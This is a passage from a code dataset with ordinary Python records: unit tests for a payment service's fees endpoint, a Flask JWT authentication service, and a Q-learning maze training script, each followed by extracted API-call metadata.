False, 'import os\n'), ((179, 39, 179, 61), 'copy.deepcopy', 'copy.deepcopy', ({(179, 53, 179, 60): 'dataset'}, {}), '(dataset)', False, 'import copy\n'), ((179, 62, 179, 84), 'copy.deepcopy', 'copy.deepcopy', ({(179, 76, 179, 83): 'dataset'}, {}), '(dataset)', False, 'import copy\n'), ((179, 85, 179, 107), 'copy.deepcopy', 'copy.deepcopy', ({(179, 99, 179, 106): 'dataset'}, {}), '(dataset)', False, 'import copy\n'), ((179, 108, 179, 135), 'numpy.arange', 'np.arange', ({(179, 118, 179, 134): 'dataset.num_data'}, {}), '(dataset.num_data)', True, 'import numpy as np\n'), ((202, 46, 202, 60), 'torch.empty', 'torch.empty', ({(202, 58, 202, 59): '0'}, {}), '(0)', False, 'import torch\n'), ((202, 61, 202, 75), 'torch.empty', 'torch.empty', ({(202, 73, 202, 74): '0'}, {}), '(0)', False, 'import torch\n'), ((212, 25, 212, 60), 'numpy.zeros', 'np.zeros', ({(212, 34, 212, 59): 'dataset.dimensionality[i]'}, {}), '(dataset.dimensionality[i])', True, 'import numpy as np\n'), ((108, 26, 108, 46), 'copy.deepcopy', 'copy.deepcopy', ({(108, 40, 108, 45): 'model'}, {}), '(model)', False, 'import copy\n'), ((109, 34, 109, 62), 'copy.deepcopy', 'copy.deepcopy', ({(109, 48, 109, 61): 'model.allgrad'}, {}), '(model.allgrad)', False, 'import copy\n'), ((131, 12, 131, 52), 'model.MLP', 'MLP', (), '', False, 'from model import MLP\n'), ((156, 27, 156, 57), 'torch.mul', 'torch.mul', ({(156, 37, 156, 47): 'train_grad', (156, 48, 156, 56): 'val_grad'}, {}), '(train_grad, val_grad)', False, 'import torch\n'), ((198, 36, 198, 61), 'torch.cuda.is_available', 
'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((233, 17, 233, 42), 'torch.from_numpy', 'torch.from_numpy', ({(233, 34, 233, 41): 'indices'}, {}), '(indices)', False, 'import torch\n'), ((64, 49, 64, 71), 'torch.mul', 'torch.mul', ({(64, 59, 64, 64): 'inter', (64, 65, 64, 70): 'error'}, {}), '(inter, error)', False, 'import torch\n'), ((89, 49, 89, 71), 'torch.mul', 'torch.mul', ({(89, 59, 89, 64): 'inter', (89, 65, 89, 70): 'error'}, {}), '(inter, error)', False, 'import torch\n'), ((121, 22, 121, 54), 'torch.zeros', 'torch.zeros', ({(121, 34, 121, 53): 'new_tensor.shape[0]'}, {}), '(new_tensor.shape[0])', False, 'import torch\n'), ((151, 19, 151, 78), 'torch.sum', 'torch.sum', (), '', False, 'import torch\n'), ((183, 70, 183, 98), 'torch.from_numpy', 'torch.from_numpy', ({(183, 87, 183, 97): 'data_train'}, {}), '(data_train)', False, 'import torch\n'), ((183, 106, 183, 136), 'torch.from_numpy', 'torch.from_numpy', ({(183, 123, 183, 135): 'labels_train'}, {}), '(labels_train)', False, 'import torch\n'), ((183, 165, 183, 194), 'torch.from_numpy', 'torch.from_numpy', ({(183, 182, 183, 193): 'index_train'}, {}), '(index_train)', False, 'import torch\n'), ((184, 62, 184, 88), 'torch.from_numpy', 'torch.from_numpy', ({(184, 79, 184, 87): 'data_val'}, {}), '(data_val)', False, 'import torch\n'), ((184, 96, 184, 124), 'torch.from_numpy', 'torch.from_numpy', ({(184, 113, 184, 123): 'labels_val'}, {}), '(labels_val)', False, 'import torch\n'), ((184, 151, 184, 178), 'torch.from_numpy', 'torch.from_numpy', ({(184, 168, 184, 177): 'index_val'}, {}), '(index_val)', False, 'import torch\n'), ((185, 68, 185, 95), 'torch.from_numpy', 'torch.from_numpy', ({(185, 85, 185, 94): 'data_test'}, {}), '(data_test)', False, 'import torch\n'), ((185, 104, 185, 133), 'torch.from_numpy', 'torch.from_numpy', ({(185, 121, 185, 132): 'labels_test'}, {}), '(labels_test)', False, 'import torch\n'), ((185, 162, 185, 190), 'torch.from_numpy', 'torch.from_numpy', ({(185, 179, 185, 189): 'index_test'}, {}), '(index_test)', False, 'import torch\n'), ((157, 43, 157, 72), 'torch.sum', 'torch.sum', (), '', False, 'import torch\n'), ((77, 39, 77, 71), 'torch.pow', 'torch.pow', ({(77, 50, 77, 67): '(prediction - labels)', (77, 69, 77, 70): '(2)'}, {}), '(prediction - labels, 2)', False, 'import torch\n')] |
saravanpa-aot/sbc-pay | pay-api/tests/unit/api/test_fee.py | fb9f61b99e506e43280bc69531ee107cc12cd92d | # Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the fees end-point.
Test-Suite to ensure that the /fees endpoint is working as expected.
"""
import json
from datetime import date, timedelta
from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType
from pay_api.schemas import utils as schema_utils
from pay_api.utils.enums import Role
from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header
def test_fees_with_corp_type_and_filing_type(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_start_date(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert not schema_utils.validate(rv.json, 'problem')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_start_date(session, client, jwt, app):
"""Assert that the endpoint returns 400."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now + timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 400
assert schema_utils.validate(rv.json, 'problem')[0]
assert not schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_end_date(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(1),
now)
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_end_date(session, client, jwt, app):
"""Assert that the endpoint returns 400."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(2),
now - timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 400
assert schema_utils.validate(rv.json, 'problem')[0]
def test_calculate_fees_with_waive_fees(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(role='staff'), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 0
def test_calculate_fees_with_waive_fees_unauthorized(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 100
def test_fees_with_quantity(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?quantity=10', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_calculate_fees_for_service_fee(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
service_fee = factory_fee_model('SF01', 1.5)
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
service_fee=service_fee)
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 100
assert rv.json.get('serviceFees') == 1.5
def test_calculate_fees_with_zero_service_fee(session, client, jwt, app):
"""Assert that service fee is zero if the filing fee is zero."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 0))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 0
assert rv.json.get('serviceFees') == 0
def test_fee_for_account_fee_settings(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(role=Role.SYSTEM.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
rv = client.post('/api/v1/accounts', data=json.dumps(get_gov_account_payload()),
headers=headers)
account_id = rv.json.get('authAccountId')
# Create account fee details.
token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
client.post(f'/api/v1/accounts/{account_id}/fees', data=json.dumps({'accountFees': [
{
'applyFilingFees': False,
'serviceFeeCode': 'TRF02', # 1.0
'product': 'BUSINESS'
}
]}), headers=headers)
# Get fee for this account.
token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
# assert filing fee is not applied and service fee is applied
assert rv.json.get('filingFees') == 0
assert rv.json.get('serviceFees') == 1.0
# Now change the settings to apply filing fees and assert
token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
client.put(f'/api/v1/accounts/{account_id}/fees/BUSINESS', data=json.dumps({
'applyFilingFees': True,
'serviceFeeCode': 'TRF01', # 1.5
'product': 'BUSINESS'
}), headers=headers)
# Get fee for this account.
token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
# assert filing fee is applied and service fee is applied
assert rv.json.get('filingFees') > 0
assert rv.json.get('serviceFees') == 1.5
def factory_filing_type_model(
filing_type_code: str,
filing_description: str = 'TEST'):
"""Return the filing type model."""
filing_type = FilingType(code=filing_type_code,
description=filing_description)
filing_type.save()
return filing_type
def factory_fee_model(
fee_code: str,
amount: int):
"""Return the fee code model."""
fee_code_master = FeeCode(code=fee_code,
amount=amount)
fee_code_master.save()
return fee_code_master
def factory_corp_type_model(
corp_type_code: str,
corp_type_description: str):
"""Return the corp type model."""
corp_type = CorpType(code=corp_type_code,
description=corp_type_description)
corp_type.save()
return corp_type
def factory_fee_schedule_model(
filing_type: FilingType,
corp_type: CorpType,
fee_code: FeeCode,
fee_start_date: date = date.today(),
fee_end_date: date = None,
service_fee: FeeCode = None):
"""Return the fee schedule model."""
fee_schedule = FeeSchedule(filing_type_code=filing_type.code,
corp_type_code=corp_type.code,
fee_code=fee_code.code,
fee_start_date=fee_start_date,
fee_end_date=fee_end_date
)
if service_fee:
fee_schedule.service_fee_code = service_fee.code
fee_schedule.save()
return fee_schedule
| [((51, 10, 51, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((71, 10, 71, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((91, 10, 91, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((111, 10, 111, 22), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((266, 18, 267, 60), 'pay_api.models.FilingType', 'FilingType', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((276, 22, 277, 44), 'pay_api.models.FeeCode', 'FeeCode', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((286, 16, 287, 59), 'pay_api.models.CorpType', 'CorpType', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((296, 31, 296, 43), 'datetime.date.today', 'date.today', ({}, {}), '()', False, 'from datetime import date, timedelta\n'), ((300, 19, 305, 32), 'pay_api.models.FeeSchedule', 'FeeSchedule', (), '', False, 'from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType\n'), ((30, 27, 30, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((40, 11, 40, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(40, 33, 40, 40): 'rv.json', (40, 42, 40, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((46, 27, 46, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((59, 11, 59, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(59, 33, 59, 40): 'rv.json', (59, 42, 59, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((66, 27, 66, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((79, 11, 79, 52), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(79, 33, 79, 40): 'rv.json', (79, 42, 79, 51): '"""problem"""'}, {}), "(rv.json, 'problem')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((86, 27, 86, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((100, 11, 100, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(100, 33, 100, 40): 'rv.json', (100, 42, 100, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((106, 27, 106, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((120, 11, 120, 52), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(120, 33, 120, 40): 'rv.json', (120, 42, 120, 51): '"""problem"""'}, {}), "(rv.json, 'problem')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((125, 27, 125, 51), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((136, 11, 136, 
49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(136, 33, 136, 40): 'rv.json', (136, 42, 136, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((142, 27, 142, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((153, 11, 153, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(153, 33, 153, 40): 'rv.json', (153, 42, 153, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((159, 27, 159, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((169, 11, 169, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(169, 33, 169, 40): 'rv.json', (169, 42, 169, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((174, 27, 174, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((188, 11, 188, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(188, 33, 188, 40): 'rv.json', (188, 42, 188, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((195, 27, 195, 39), 'tests.utilities.base_test.get_claims', 'get_claims', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((207, 11, 207, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(207, 33, 207, 40): 'rv.json', (207, 42, 207, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((214, 27, 214, 61), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((222, 27, 222, 70), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((233, 27, 233, 61), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((237, 11, 237, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(237, 33, 237, 40): 'rv.json', (237, 42, 237, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((243, 27, 243, 70), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((252, 27, 252, 61), 'tests.utilities.base_test.get_claims', 'get_claims', (), '', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n'), ((256, 11, 256, 49), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(256, 33, 256, 40): 'rv.json', (256, 42, 256, 48): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((56, 14, 56, 26), 'datetime.timedelta', 'timedelta', ({(56, 24, 56, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((60, 15, 60, 56), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(60, 
37, 60, 44): 'rv.json', (60, 46, 60, 55): '"""problem"""'}, {}), "(rv.json, 'problem')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((76, 14, 76, 26), 'datetime.timedelta', 'timedelta', ({(76, 24, 76, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((80, 15, 80, 53), 'pay_api.schemas.utils.validate', 'schema_utils.validate', ({(80, 37, 80, 44): 'rv.json', (80, 46, 80, 52): '"""fees"""'}, {}), "(rv.json, 'fees')", True, 'from pay_api.schemas import utils as schema_utils\n'), ((96, 14, 96, 26), 'datetime.timedelta', 'timedelta', ({(96, 24, 96, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((116, 14, 116, 26), 'datetime.timedelta', 'timedelta', ({(116, 24, 116, 25): '(2)'}, {}), '(2)', False, 'from datetime import date, timedelta\n'), ((117, 14, 117, 26), 'datetime.timedelta', 'timedelta', ({(117, 24, 117, 25): '(1)'}, {}), '(1)', False, 'from datetime import date, timedelta\n'), ((224, 60, 230, 7), 'json.dumps', 'json.dumps', ({(224, 71, 230, 6): "{'accountFees': [{'applyFilingFees': False, 'serviceFeeCode': 'TRF02',\n 'product': 'BUSINESS'}]}"}, {}), "({'accountFees': [{'applyFilingFees': False, 'serviceFeeCode':\n 'TRF02', 'product': 'BUSINESS'}]})", False, 'import json\n'), ((245, 68, 249, 6), 'json.dumps', 'json.dumps', ({(245, 79, 249, 5): "{'applyFilingFees': True, 'serviceFeeCode': 'TRF01', 'product': 'BUSINESS'}"}, {}), "({'applyFilingFees': True, 'serviceFeeCode': 'TRF01', 'product':\n 'BUSINESS'})", False, 'import json\n'), ((216, 57, 216, 82), 'tests.utilities.base_test.get_gov_account_payload', 'get_gov_account_payload', ({}, {}), '()', False, 'from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header\n')] |
pers0n4/yoonyaho | backend/app/auth/service.py | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | from datetime import datetime, timedelta
import jwt
from flask import current_app
from app import db
from app.user.repository import UserRepository
class AuthService:
def __init__(self) -> None:
self._user_repository = UserRepository(db.session)
def create_token(self, data) -> dict:
user = self._user_repository.find_one(user_id=data["user_id"])
if user is None:
# user not found
raise RuntimeError
if not user.check_password(data["password"]):
            # wrong password
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
refresh_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(hours=4),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token, "refresh_token": refresh_token}
def validate_token(self, token) -> dict:
return jwt.decode(token, current_app.config["SECRET_KEY"], algorithms=["HS512"])
def refresh_token(self, token) -> dict:
payload = self.validate_token(token)
user = self._user_repository.find_one(id=payload["user_id"])
if user is None:
# user not found
raise RuntimeError
access_token = jwt.encode(
{
"iat": datetime.utcnow(),
"exp": datetime.utcnow() + timedelta(minutes=60),
"user_id": str(user.id),
},
current_app.config["SECRET_KEY"],
algorithm="HS512",
)
return {"access_token": access_token}
| [((12, 32, 12, 58), 'app.user.repository.UserRepository', 'UserRepository', ({(12, 47, 12, 57): 'db.session'}, {}), '(db.session)', False, 'from app.user.repository import UserRepository\n'), ((44, 15, 44, 88), 'jwt.decode', 'jwt.decode', (), '', False, 'import jwt\n'), ((26, 23, 26, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((35, 23, 35, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((55, 23, 55, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((27, 23, 27, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((27, 43, 27, 64), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((36, 23, 36, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((36, 43, 36, 61), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((56, 23, 56, 40), 'datetime.datetime.utcnow', 'datetime.utcnow', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((56, 43, 56, 64), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n')] |
kebaek/minigrid | scripts/qlearn.py | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | import _init_paths
import argparse
import random
import time
import utils
import os
from collections import defaultdict
import numpy as np
import csv
from progress.bar import IncrementalBar
from utils.hash import *
def parse_arguments():
parser = argparse.ArgumentParser()
# add arguments
parser.add_argument('--env', type=str, default='../env/maze_2.txt',
help='name of the environment')
parser.add_argument("--dir", type=str, default="",
help="name of the directory to episodes")
parser.add_argument('--num_episode', type=int, default=2000,
help='the number of train episodes')
parser.add_argument('--max_episode_length', type=int, default=200,
help='the maximum of the length of an episode')
parser.add_argument('--lr', type=float, default=0.1,
help='the learning rate of the q learning algorithm')
parser.add_argument('--discount', type=float, default=0.9,
help='the discount factor')
parser.add_argument('--eps', type=float, default=0.8,
help='the value for the eps-greedy strategy')
parser.add_argument('--seed', type=int, default=0,
help='random seed for environment')
# parse arguments
args = parser.parse_args()
return args
def train(maze_env, model_dir, num_episode, max_episode_length, lr,
discount, eps, **kwargs):
# create value function and q value function
q_value_function = {}
visited_actions = {}
visited_states = set()
q_value_function = defaultdict(lambda: 0, q_value_function)
visited_actions = defaultdict(lambda: [False]*maze_env.action_space.n, visited_actions)
# train agent
start = time.time()
episodes_length = []
    bar = IncrementalBar('Countdown', max=num_episode)
print("Start to train q value function.")
for _ in range(num_episode):
current_length = 0
is_terminal = 0
obs = maze_env.reset()
state = str(maze_env)
        # bound each episode at max_episode_length steps (the CLI flag above)
        while not is_terminal and current_length < max_episode_length:
visited_states.add(state)
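            # Epsilon-greedy action selection: explore with probability eps,
            # otherwise act greedily; if the greedy value is still 0, fall
            # back to an action not yet tried in this state.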
if random.random() <= eps:
action = random.randint(0, maze_env.action_space.n - 1)
else:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
if False in visited_actions[state]:
action = visited_actions[state].index(False)
else:
action = random.randint(0, maze_env.action_space.n - 1)
visited_actions[state][action] = True
next_obs, reward, is_terminal, info = maze_env.step(action)
next_state = str(maze_env)
current_length += 1
next_action, next_q_value = get_max_action(next_state, q_value_function, maze_env)
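            # Q-learning (Bellman) update:
            # Q(s,a) <- (1 - lr) * Q(s,a) + lr * (reward + discount * max_a' Q(s',a'))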
max_q_value_target = reward + discount*next_q_value
q_value_function[hash_state_action(state, action)] = (1 - lr) * \
q_value_function[hash_state_action(state, action)] + lr*max_q_value_target
state = next_state
bar.next()
episodes_length.append(current_length)
print("Finish training q value function.")
end = time.time()
bar.finish()
print("[Statistics]: Avg_length {0} and Time {1}s".format(sum(episodes_length) / len(episodes_length), end - start))
# output
print("Start to output q value function and policy to file.")
file = open(model_dir + '/q_value.csv', "w")
fieldnames = ['state', 'action', 'value']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for key, value in q_value_function.items():
state, action = reverse_hashing_state_action(key)
writer.writerow({'state':state, 'action':action, 'value':value})
file.close()
file = open(model_dir + '/policy.csv', "w")
fieldnames = ['state', 'action']
writer = csv.DictWriter(file, fieldnames=fieldnames)
for state in visited_states:
action, value = get_max_action(state, q_value_function, maze_env)
if value == 0:
action = -1
writer.writerow({'state':state, 'action':action})
file.close()
print("Finish outputting q value function to file.")
def main():
# parse arguments
args = parse_arguments()
# create env
maze_env = utils.make_env(args.env, args.seed + 10000)
print('Environment Loaded\n')
model_dir = utils.get_model_dir(args.env + '/' + args.dir + '/aQL/lr%.2f_discount%.2f_eps%.2f/epi%dseed%d'%(args.lr, args.discount, args.eps, args.num_episode, args.seed))
os.makedirs(model_dir, exist_ok=True)
print(model_dir)
# train agent
